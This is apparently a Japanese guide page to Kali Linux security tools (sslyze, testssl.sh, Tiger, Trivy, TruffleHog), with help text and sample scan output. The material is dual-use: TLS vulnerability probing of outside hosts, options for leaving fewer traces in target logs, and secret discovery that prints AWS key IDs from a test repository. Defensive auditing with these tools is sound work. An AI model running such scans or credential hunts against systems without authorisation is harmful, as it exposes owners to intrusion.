[--json_out JSON_FILE] [--targets_in TARGET_FILE] [--quiet] [--slow_connection] [--https_tunnel PROXY_SETTINGS]
[--starttls PROTOCOL] [--xmpp_to HOSTNAME] [--sni SERVER_NAME_INDICATION] [--sslv3] [--tlsv1_2] [--compression] [--tlsv1]
[--tlsv1_3] [--early_data] [--http_headers] [--resum] [--resum_attempts RESUM_ATTEMPTS] [--elliptic_curves] [--sslv2] [--reneg]
[--certinfo] [--certinfo_ca_file CERTINFO_CA_FILE] [--heartbleed] [--robot] [--openssl_ccs] [--fallback] [--tlsv1_1]
[--mozilla_config {modern,intermediate,old,disable}]
[target ...]
positional arguments:
target The list of servers to scan.
options:
-h, --help show this help message and exit
--mozilla_config {modern,intermediate,old,disable}
Shortcut to queue various scan commands needed to check the server's TLS configurations against one of Mozilla's
recommended TLS configuration. Set to "intermediate" by default. Use "disable" to disable this check.
Trust stores options:
--update_trust_stores
Update the default trust stores used by SSLyze. The latest stores will be downloaded from
https://github.com/nabla-c0d3/trust_stores_observatory. This option is meant to be used separately, and will silence
any other command line option supplied to SSLyze.
Client certificate options:
--cert CERTIFICATE_FILE
Client certificate chain filename. The certificates must be in PEM format and must be sorted starting with the
subject\'s client certificate, followed by intermediate CA certificates if applicable.
--key KEY_FILE Client private key filename.
--keyform KEY_FORMAT Client private key format. DER or PEM (default).
--pass PASSPHRASE Client private key passphrase.
Input and output options:
--json_out JSON_FILE Write the scan results as a JSON document to the file JSON_FILE. If JSON_FILE is set to '-', the JSON output will
instead be printed to stdout. The resulting JSON file is a serialized version of the ScanResult objects described in
SSLyze\'s Python API: the nodes and attributes will be the same. See
https://nabla-c0d3.github.io/sslyze/documentation/available-scan-commands.html for more details.
--targets_in TARGET_FILE
Read the list of targets to scan from the file TARGET_FILE. It should contain one host:port per line.
--quiet Do not output anything to stdout; useful when using --json_out.
Contectivity options:
--slow_connection Greatly reduce the number of concurrent connections initiated by SSLyze. This will make the scans slower but more
reliable if the connection between your host and the server is slow, or if the server cannot handle many concurrent
connections. Enable this option if you are getting a lot of timeouts or errors.
--https_tunnel PROXY_SETTINGS
Tunnel all traffic to the target server(s) through an HTTP CONNECT proxy. HTTP_TUNNEL should be the proxy\'s URL:
'http://USER:PW@HOST:PORT/'. For proxies requiring authentication, only Basic Authentication is supported.
--starttls PROTOCOL Perform a StartTLS handshake when connecting to the target server(s). StartTLS should be one of: auto, smtp, xmpp,
xmpp_server, pop3, imap, ftp, ldap, rdp, postgres. The 'auto' option will cause SSLyze to deduce the protocol (ftp,
imap, etc.) from the supplied port number, for each target servers.
--xmpp_to HOSTNAME Optional setting for STARTTLS XMPP. XMPP_TO should be the hostname to be put in the 'to' attribute of the XMPP stream.
Default is the server\'s hostname.
--sni SERVER_NAME_INDICATION
Use Server Name Indication to specify the hostname to connect to. Will only affect TLS 1.0+ connections.
Scan commands:
--sslv3 Test a server for SSL 3.0 support.
--tlsv1_2 Test a server for TLS 1.2 support.
--compression Test a server for TLS compression support, which can be leveraged to perform a CRIME attack.
--tlsv1 Test a server for TLS 1.0 support.
--tlsv1_3 Test a server for TLS 1.3 support.
--early_data Test a server for TLS 1.3 early data support.
--http_headers Test a server for the presence of security-related HTTP headers.
--resum Test a server for TLS 1.2 session resumption support using session IDs and TLS tickets.
--resum_attempts RESUM_ATTEMPTS
To be used with --resum. Number of session resumptions (both with Session IDs and TLS Tickets) that SSLyze should
attempt. The default value is 5, but a higher value such as 100 can be used to get a more accurate measure of how
often session resumption succeeds or fails with the server.
--elliptic_curves Test a server for supported elliptic curves.
--sslv2 Test a server for SSL 2.0 support.
--reneg Test a server for for insecure TLS renegotiation and client-initiated renegotiation.
--certinfo Retrieve and analyze a server\'s certificate(s) to verify its validity.
--certinfo_ca_file CERTINFO_CA_FILE
To be used with --certinfo. Path to a file containing root certificates in PEM format that will be used to verify the
validity of the server\'s certificate.
--heartbleed Test a server for the OpenSSL Heartbleed vulnerability.
--robot Test a server for the ROBOT vulnerability.
--openssl_ccs Test a server for the OpenSSL CCS Injection vulnerability (CVE-2014-0224).
--fallback Test a server for the TLS_FALLBACK_SCSV mechanism to prevent downgrade attacks.
--tlsv1_1 Test a server for TLS 1.1 support.
■ 使用例
root@kali:~# sslyze example.com
SCAN RESULTS FOR EXAMPLE.COM:443 - 93.184.215.14
------------------------------------------------
* Certificates Information:
Hostname sent for SNI: example.com
Number of certificates detected: 1
Certificate #0 ( RSAPublicKey )
SHA1 Fingerprint: 4da25a6d5ef62c5f95c7bd0a73ea3c177b36999d
Common Name: www.example.org
Issuer: DigiCert Global G2 TLS RSA SHA256 2020 CA1
Serial Number: 9781292415466404211737309641897402759
Not Before: 2024-01-30
Not After: 2025-03-01
Public Key Algorithm: RSAPublicKey
Signature Algorithm: sha256
Key Size: 2048
Exponent: 65537
SubjAltName - DNS Names: ['www.example.org', 'example.net', 'example.edu', 'example.com', 'example.org', 'www.example.com', 'www.example.edu', 'www.example.net']
Certificate #0 - Trust
Android CA Store (14.0.0_r9): OK - Certificate is trusted
Apple CA Store (iOS 17, iPadOS 17, macOS 14, tvOS 17, and watchOS 10):OK - Certificate is trusted
Java CA Store (jdk-13.0.2): OK - Certificate is trusted
Mozilla CA Store (2024-02-04): OK - Certificate is trusted
Windows CA Store (2023-12-11): OK - Certificate is trusted
Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
Received Chain: www.example.org --> DigiCert Global G2 TLS RSA SHA256 2020 CA1
Verified Chain: www.example.org --> DigiCert Global G2 TLS RSA SHA256 2020 CA1 --> DigiCert Global Root G2
Received Chain Contains Anchor: OK - Anchor certificate not sent
Received Chain Order: OK - Order is valid
Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain
[...]
* TLS 1.3 Cipher Suites:
Attempted to connect using 5 cipher suites.
The server accepted the following 3 cipher suites:
TLS_CHACHA20_POLY1305_SHA256 256 ECDH: prime256v1 (256 bits)
TLS_AES_256_GCM_SHA384 256 ECDH: prime256v1 (256 bits)
TLS_AES_128_GCM_SHA256 128 ECDH: prime256v1 (256 bits)
* Deflate Compression:
OK - Compression disabled
* OpenSSL CCS Injection:
OK - Not vulnerable to OpenSSL CCS injection
* OpenSSL Heartbleed:
OK - Not vulnerable to Heartbleed
* ROBOT Attack:
OK - Not vulnerable.
* Session Renegotiation:
Client Renegotiation DoS Attack: OK - Not vulnerable
Secure Renegotiation: OK - Supported
testssl.sh
TLS/SSL暗号、プロトコル、脆弱性のある暗号スイートのサポート状況などSSLに関する様々なチェックを行います。
■ 使用方法
root@kali:~# testssl --help
"testssl [options] <URI>" or "testssl <options>"
"testssl <option>", where <option> is mostly standalone and one of:
--help what you\'re looking at
-b, --banner displays banner + version of testssl
-v, --version same as previous
-V, --local [pattern] pretty print all local ciphers (of openssl only). If search pattern supplied: it is an
an ignore case word pattern of cipher hexcode or any other string in its name, kx or bits
"testssl [options] <URI>", where <URI> is:
<URI> host|host:port|URL|URL:port port 443 is default, URL can only contain HTTPS as a protocol
and [options] is/are:
-t, --starttls <protocol> Does a run against a STARTTLS enabled service which is one of ftp, smtp, lmtp, pop3, imap,
sieve, xmpp, xmpp-server, telnet, ldap, nntp, postgres, mysql
--xmpphost <to_domain> For STARTTLS xmpp or xmpp-server checks it supplies the domainname (like SNI)
--mx <domain/host> Tests MX records from high to low priority (STARTTLS, port 25)
--file/-iL <fname> Mass testing option: Reads one testssl.sh command line per line from <fname>.
Can be combined with --serial or --parallel. Implicitly turns on "--warnings batch".
Text format 1: Comments via # allowed, EOF signals end of <fname>
Text format 2: nmap output in greppable format (-oG), 1 port per line allowed
--mode <serial|parallel> Mass testing to be done serial (default) or parallel (--parallel is shortcut for the latter)
--warnings <batch|off> "batch" doesn\'t continue when a testing error is encountered, off continues and skips warnings
--connect-timeout <seconds> useful to avoid hangers. Max <seconds> to wait for the TCP socket connect to return
--openssl-timeout <seconds> useful to avoid hangers. Max <seconds> to wait before openssl connect will be terminated
single check as <options> ("testssl URI" does everything except -E and -g):
-e, --each-cipher checks each local cipher remotely
-E, --cipher-per-proto checks those per protocol
-s, --std, --categories tests standard cipher categories by strength
-f, --fs, --nsa checks forward secrecy settings
-p, --protocols checks TLS/SSL protocols (including SPDY/HTTP2)
-g, --grease tests several server implementation bugs like GREASE and size limitations
-S, --server-defaults displays the server\'s default picks and certificate info
-P, --server-preference displays the server\'s picks: protocol+cipher
-x, --single-cipher <pattern> tests matched <pattern> of ciphers
(if <pattern> not a number: word match)
-c, --client-simulation test client simulations, see which client negotiates with cipher and protocol
-h, --header, --headers tests HSTS, HPKP, server/app banner, security headers, cookie, reverse proxy, IPv4 address
-U, --vulnerable tests all (of the following) vulnerabilities (if applicable)
-H, --heartbleed tests for Heartbleed vulnerability
-I, --ccs, --ccs-injection tests for CCS injection vulnerability
-T, --ticketbleed tests for Ticketbleed vulnerability in BigIP loadbalancers
--BB, --robot tests for Return of Bleichenbacher\'s Oracle Threat (ROBOT) vulnerability
--SI, --starttls-injection tests for STARTTLS injection issues
-R, --renegotiation tests for renegotiation vulnerabilities
-C, --compression, --crime tests for CRIME vulnerability (TLS compression issue)
-B, --breach tests for BREACH vulnerability (HTTP compression issue)
-O, --poodle tests for POODLE (SSL) vulnerability
-Z, --tls-fallback checks TLS_FALLBACK_SCSV mitigation
-W, --sweet32 tests 64 bit block ciphers (3DES, RC2 and IDEA): SWEET32 vulnerability
-A, --beast tests for BEAST vulnerability
-L, --lucky13 tests for LUCKY13
-WS, --winshock tests for winshock vulnerability
-F, --freak tests for FREAK vulnerability
-J, --logjam tests for LOGJAM vulnerability
-D, --drown tests for DROWN vulnerability
-4, --rc4, --appelbaum which RC4 ciphers are being offered?
tuning / connect options (most also can be preset via environment variables):
-9, --full includes tests for implementation bugs and cipher per protocol (could disappear)
--bugs enables the "-bugs" option of s_client, needed e.g. for some buggy F5s
--assume-http if protocol check fails it assumes HTTP protocol and enforces HTTP checks
--ssl-native use OpenSSL where sockets are normally used. Faster but inaccurate, avoid it if possible
--openssl <PATH> use this openssl binary (default: look in $PATH, $RUN_DIR of testssl)
--proxy <host:port|auto> (experimental) proxy connects via <host:port>, auto: values from $env ($http(s)_proxy)
-6 also use IPv6. Works only with supporting OpenSSL version and IPv6 connectivity
--ip <ip> a) tests the supplied <ip> v4 or v6 address instead of resolving host(s) in URI
b) "one" means: just test the first DNS returns (useful for multiple IPs)
c) "proxy" means: dns resolution via proxy. Needed when host has no DNS.
-n, --nodns <min|none> if "none": do not try any DNS lookups, "min" queries A, AAAA and MX records
--sneaky leave less traces in target logs: user agent, referer
--user-agent <user agent> set a custom user agent instead of the standard user agent
--ids-friendly skips a few vulnerability checks which may cause IDSs to block the scanning IP
--phone-out allow to contact external servers for CRL download and querying OCSP responder
--add-ca <CA files|CA dir> path to <CAdir> with *.pem or a comma separated list of CA files to include in trust check
--basicauth <user:pass> provide HTTP basic auth information.
--reqheader <header> add custom http request headers
output options (can also be preset via environment variables):
--quiet don\'t output the banner. By doing this you acknowledge usage terms normally appearing in the banner
--wide wide output for tests like RC4, BEAST. FS also with hexcode, kx, strength, RFC name
--show-each for wide outputs: display all ciphers tested -- not only succeeded ones
--mapping <openssl| openssl: use the OpenSSL cipher suite name as the primary name cipher suite name form (default)
iana|rfc -> use the IANA/(RFC) cipher suite name as the primary name cipher suite name form
no-openssl| -> don\'t display the OpenSSL cipher suite name, display IANA/(RFC) names only
no-iana|no-rfc> -> don\'t display the IANA/(RFC) cipher suite name, display OpenSSL names only
--color <0|1|2|3> 0: no escape or other codes, 1: b/w escape codes, 2: color (default), 3: extra color (color all ciphers)
--colorblind swap green and blue in the output
--debug <0-6> 1: screen output normal but keeps debug output in /tmp/. 2-6: see "grep -A 5 '^DEBUG=' testssl.sh"
--disable-rating Explicitly disables the rating output
file output options (can also be preset via environment variables)
--log, --logging logs stdout to '${NODE}-p${port}${YYYYMMDD-HHMM}.log' in current working directory (cwd)
--logfile|-oL <logfile> logs stdout to 'dir/${NODE}-p${port}${YYYYMMDD-HHMM}.log'. If 'logfile' is a dir or to a specified 'logfile'
--json additional output of findings to flat JSON file '${NODE}-p${port}${YYYYMMDD-HHMM}.json' in cwd
--jsonfile|-oj <jsonfile> additional output to the specified flat JSON file or directory, similar to --logfile
--json-pretty additional JSON structured output of findings to a file '${NODE}-p${port}${YYYYMMDD-HHMM}.json' in cwd
--jsonfile-pretty|-oJ <jsonfile> additional JSON structured output to the specified file or directory, similar to --logfile
--csv additional output of findings to CSV file '${NODE}-p${port}${YYYYMMDD-HHMM}.csv' in cwd or directory
--csvfile|-oC <csvfile> additional output as CSV to the specified file or directory, similar to --logfile
--html additional output as HTML to file '${NODE}-p${port}${YYYYMMDD-HHMM}.html'
--htmlfile|-oH <htmlfile> additional output as HTML to the specified file or directory, similar to --logfile
--out(f,F)ile|-oa/-oA <fname> log to a LOG,JSON,CSV,HTML file (see nmap). -oA/-oa: pretty/flat JSON.
"auto" uses '${NODE}-p${port}${YYYYMMDD-HHMM}'. If fname if a dir uses 'dir/${NODE}-p${port}${YYYYMMDD-HHMM}'
--hints additional hints to findings
--severity <severity> severities with lower level will be filtered for CSV+JSON, possible values <LOW|MEDIUM|HIGH|CRITICAL>
--append if (non-empty) <logfile>, <csvfile>, <jsonfile> or <htmlfile> exists, append to file. Omits any header
--overwrite if <logfile>, <csvfile>, <jsonfile> or <htmlfile> exists it overwrites it without any warning
--outprefix <fname_prefix> before '${NODE}.' above prepend <fname_prefix>
■ 使用例
root@kali:~# testssl --ip one xxxx.go.jp
Testing protocols via sockets except NPN+ALPN
SSLv2 not offered (OK)
SSLv3 not offered (OK)
TLS 1 not offered
TLS 1.1 not offered
TLS 1.2 offered (OK)
TLS 1.3 offered (OK): final
NPN/SPDY not offered
ALPN/HTTP2 not offered
Testing cipher categories
NULL ciphers (no encryption) not offered (OK)
Anonymous NULL Ciphers (no authentication) not offered (OK)
Export ciphers (w/o ADH+NULL) not offered (OK)
LOW: 64 Bit + DES, RC[2,4], MD5 (w/o export) not offered (OK)
Triple DES Ciphers / IDEA not offered
Obsoleted CBC ciphers (AES, ARIA etc.) offered
[...]
Testing vulnerabilities
Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
CCS (CVE-2014-0224) not vulnerable (OK)
Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
ROBOT not vulnerable (OK)
Secure Renegotiation (RFC 5746) supported (OK)
Secure Client-Initiated Renegotiation likely not vulnerable (OK), timed out
CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
BREACH (CVE-2013-3587) no gzip/deflate/compress/br HTTP compression (OK) - only supplied "/" tested
POODLE, SSL (CVE-2014-3566) not vulnerable (OK), no SSLv3 support
TLS_FALLBACK_SCSV (RFC 7507) No fallback possible (OK), no protocol below TLS 1.2 offered
SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
FREAK (CVE-2015-0204) not vulnerable (OK)
DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
make sure you don\'t use this certificate elsewhere with SSLv2 enabled services, see
https://search.censys.io/search?resource=hosts&virtual_hosts=INCLUDE&q=4D8B3E530422123AED9839920C8F5AA19CC2C9FD16033D74CB402E64E70FD8E9
LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected with <= TLS 1.2
BEAST (CVE-2011-3389) not vulnerable (OK), no SSL3 or TLS1
LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches
Winshock (CVE-2014-6321), experimental not vulnerable (OK)
RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
[...]
Rating (experimental)
Rating specs (not complete) SSL Labs\'s 'SSL Server Rating Guide' (version 2009q from 2020-01-30)
Specification documentation https://github.com/ssllabs/research/wiki/SSL-Server-Rating-Guide
Protocol Support (weighted) 100 (30)
Key Exchange (weighted) 90 (27)
Cipher Strength (weighted) 90 (36)
Final Score 93
Overall Grade A
Grade cap reasons Grade capped to A. HSTS is not offered
Tiger
Unix/Linuxサーバーのセキュリティ監査を行います。
■ 使用方法
root@kali:~# tiger -h
Usage: ./tiger [-vthqGSH] [-B dir] [-l dir|@host] [-w dir] [-b dir] [-e|-E] [-c config] [-A arch] [-O os] [-R release]
-v Show the Tiger version.
-t Run in test mode.
-h Show usage (this help).
-q Supress messages to be as quiet as possible, only
security messages will be shown.
-B name
Specify the directory where tiger is installed. If
not specified, '/usr/lib/tiger' is used.
-l name
Specify the name of the directory where Tiger will
write the security report. This defaults to
'/var/log/tiger'. The filename of the report will be of
the form 'security.report.host-name.date.time.'
If the directory begins with a @, the name will
be interpreted as a tiger logging server.
-w name
Specify a directory to use for creating scratch
files. This defaults to '/var/lib/tiger/work'.
-b name
Specify the directory which contains (or will con-
tain) the binaries generated from the C modules.
If the systems directories contain all the bina-
ries, they will be used directly from there. If
not, then if the bindir contains the binaries,
these will be used. If none are found in either
place, then an attempt will be made to compile the
C code and install the executables into the bindir.
-c name
Specify an alternate name for the tigerrc control
file. The default is '/etc/tiger/tigerrc'.
-e This option will cause explanations to be inserted
into the security report following each message.
This can greatly increase the size of the report,
as explanations may appear repeatedly.
-E This option indicates that a separate explanation
report should be created, with explanations for
each type of message only appearing once. The
filename of the explanation report will be of the
form 'explain.report.hostname.date.time.'
-G Generate the signatures (MD5 hashes and file permissions)
for system binary files.
-H This option will format the report into HTML creat-
ing local links to the problem descriptions.
-S This option indicates that a surface level check of
the configuration files of any diskless clients
served by this machine should be checked at the
same time. The checks will not be as in depth as
they would be if run on the client itself.
Overrides for values detected by the configuration system:
-A arch
Specify an alternate architecture for tiger
-O os
Specify an alternate operating system for tiger
-R release
Specify an alternate operating system release
for tiger
■ 使用例
root@kali:~# tiger
03:44> Beginning security report for kali_2.
03:44> Starting file systems scans in background...
03:44> Checking password files...
03:44> Checking group files...
03:44> Checking user accounts...
03:44> Checking .rhosts files...
03:44> Checking .netrc files...
03:44> Checking ttytab, securetty, and login configuration files...
03:44> Checking PATH settings...
03:44> Checking anonymous ftp setup...
03:44> Checking mail aliases...
03:44> Checking cron entries...
[...]
Security report is in `/var/log/tiger/security.report.kali.241125-03:44\'.
root@kali:~# cat /var/log/tiger/security.report.kali.241125-03:44
# Performing check of passwd files...
# Checking entries from /etc/passwd.
--WARN-- [pass014w] Login (root) is disabled, but has a valid shell.
--WARN-- [pass015w] Login ID sync does not have a valid shell (/bin/sync).
--WARN-- [pass016w] User systemd-network has / as home directory
--WARN-- [pass016w] User systemd-timesync has / as home directory
--WARN-- [pass012w] Home directory / exists multiple times (2) in /etc/passwd.
[...]
Trivy
ファイルシステム、コンテナイメージ、コードリポジトリ、VMイメージなどの脆弱性、設定ミス、シークレットなどを検出します。
■ 使用方法
root@kali:~# trivy --help
Usage:
trivy [global flags] command [flags] target
trivy [command]
Scanning Commands
config Scan config files for misconfigurations
filesystem Scan local filesystem
image Scan a container image
kubernetes [EXPERIMENTAL] Scan kubernetes cluster
repository Scan a repository
rootfs Scan rootfs
sbom Scan SBOM for vulnerabilities and licenses
vm [EXPERIMENTAL] Scan a virtual machine image
Management Commands
module Manage modules
plugin Manage plugins
vex [EXPERIMENTAL] VEX utilities
Utility Commands
clean Remove cached files
completion Generate the autocompletion script for the specified shell
convert Convert Trivy JSON report into a different format
help Help about any command
registry Manage registry authentication
server Server mode
version Print the version
Flags:
--cache-dir string cache directory (default "/root/.cache/trivy")
-c, --config string config path (default "trivy.yaml")
-d, --debug debug mode
-f, --format string version format (json)
--generate-default-config write the default config to trivy-default.yaml
-h, --help help for trivy
--insecure allow insecure server connections
-q, --quiet suppress progress bar and log output
--timeout duration timeout (default 5m0s)
-v, --version show version
■ 使用例
root@kali:~# trivy image sample-app:latest
sample-app:latest (ubuntu 14.04)
Total: 152 (UNKNOWN: 0, LOW: 66, MEDIUM: 80, HIGH: 6, CRITICAL: 0)
┌─────────────┬───────────────┬──────────┬────────┬───────────────────┬────────────────────┬──────────────────────────────────────────────────────────────┐
│ Library │ Vulnerability │ Severity │ Status │ Installed Version │ Fixed Version │ Title
│
├─────────────┼───────────────┼──────────┼────────┼───────────────────┼────────────────────┼──────────────────────────────────────────────────────────────┤
│ libssl1.0.0 │ CVE-2016-2107 │ HIGH │ fixed │ 1.0.1e-2 │ 1.0.1f-1ubuntu2.19 │ openssl: Padding oracle in AES-NI CBC MAC check
│
│ │ │ │ │ │ │ https://avd.aquasec.com/nvd/cve-2016-2107
│
│ ├───────────────┤ │ │ │ ├────────────────────────────────────────────────────
[...]
/etc/ssl/private/ssl-cert-snakeoil.key (secrets)
Total: 1 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 1, CRITICAL: 0)
HIGH: AsymmetricPrivateKey (private-key)
════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════
Asymmetric Private Key
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/etc/ssl/private/ssl-cert-snakeoil.key:1 (added by 'RUN /bin/sh -c apt install -y wget curl ')
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[...]
TruffleHog
ファイルシステム、コンテナイメージ、コードリポジトリ、クラウドストレージなど様々な場所からシークレットを検出します。
■ 使用方法
root@kali:~# trufflehog --help
usage: TruffleHog [<flags>] <command> [<args> ...]
Flags:
--help Show context-sensitive help (also try --help-long and --help-man).
--debug Run in debug mode.
--trace Run in trace mode.
--profile Enables profiling and sets a pprof and fgprof server on :18066.
-j, --json Output in JSON format.
--json-legacy Use the pre-v3.0 JSON format. Only works with git, gitlab, and github sources.
--github-actions Output in GitHub Actions format.
--concurrency=8 Number of concurrent workers.
--no-verification Don\'t verify the results.
--only-verified Only output verified results.
--filter-unverified Only output first unverified result per chunk per detector if there are more than one results.
--config=CONFIG Path to configuration file.
--print-avg-detector-time Print the average time spent on each detector.
--no-update Don\'t check for updates.
--fail Exit with code 183 if results are found.
--verifier=VERIFIER ... Set custom verification endpoints.
--archive-max-size=ARCHIVE-MAX-SIZE
Maximum size of archive to scan. (Byte units eg. 512B, 2KB, 4MB)
--archive-max-depth=ARCHIVE-MAX-DEPTH
Maximum depth of archive to scan.
--archive-timeout=ARCHIVE-TIMEOUT
Maximum time to spend extracting an archive.
--include-detectors="all" Comma separated list of detector types to include. Protobuf name or IDs may be used, as well as ranges.
--exclude-detectors=EXCLUDE-DETECTORS
Comma separated list of detector types to exclude. Protobuf name or IDs may be used, as well as ranges.
IDs defined here take precedence over the include list.
--version Show application version.
Commands:
help [<command>...]
Show help.
git [<flags>] <uri>
Find credentials in git repositories.
github [<flags>]
Find credentials in GitHub repositories.
gitlab --token=TOKEN [<flags>]
Find credentials in GitLab repositories.
filesystem [<flags>] [<path>...]
Find credentials in a filesystem.
s3 [<flags>]
Find credentials in S3 buckets.
gcs [<flags>]
Find credentials in GCS buckets.
syslog [<flags>]
Scan syslog
circleci --token=TOKEN
Scan CircleCI
docker --image=IMAGE
Scan Docker Image
■ 使用例
# GitHubのリポジトリおよびissueコメント、Pull Requestコメントからシークレットを検出する
root@kali:~# trufflehog github --repo=https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments
Found verified result 🐷🔑
Detector Type: AWS
Decoder Type: PLAIN
Raw result: AKIAQYLPMN5HHHFPZAM2
Account: 052310077262
User_id: AIDAQYLPMN5HCQD6W5U5W
Arn: arn:aws:iam::052310077262:user/canarytokens.com@@c20nnjzlioibnaxvt392i9ope
Commit: 0416560b1330d8ac42045813251d85c688717eaf
Email: counter <hello@trufflesec.com>
File: new_key
Line: 2
Link: https://github.com/trufflesecurity/test_keys/blob/0416560b1330d8ac42045813251d85c688717eaf/new_key#L2
Repository: https://github.com/trufflesecurity/test_keys.git
Timestamp: 2023-10-19 02:56:37 +0000
[...]
Found verified result 🐷🔑
Detector Type: AWS
Decoder Type: PLAIN
Raw result: AKIAQYLPMN5HLU6OP3FX
Arn: arn:aws:iam::052310077262:user/canarytokens.com@@4y924v19oqbe551caetqhx6pn
Account: 052310077262
User_id: AIDAQYLPMN5HFO4YI7IOF
Line: 1
Link: https://github.com/trufflesecurity/test_keys/issues/3#issuecomment-1731842331L1
Repository: test_keys
Timestamp: 2023-09-22 18:06:26 +0000 UTC
Username: joeleonjr
[...]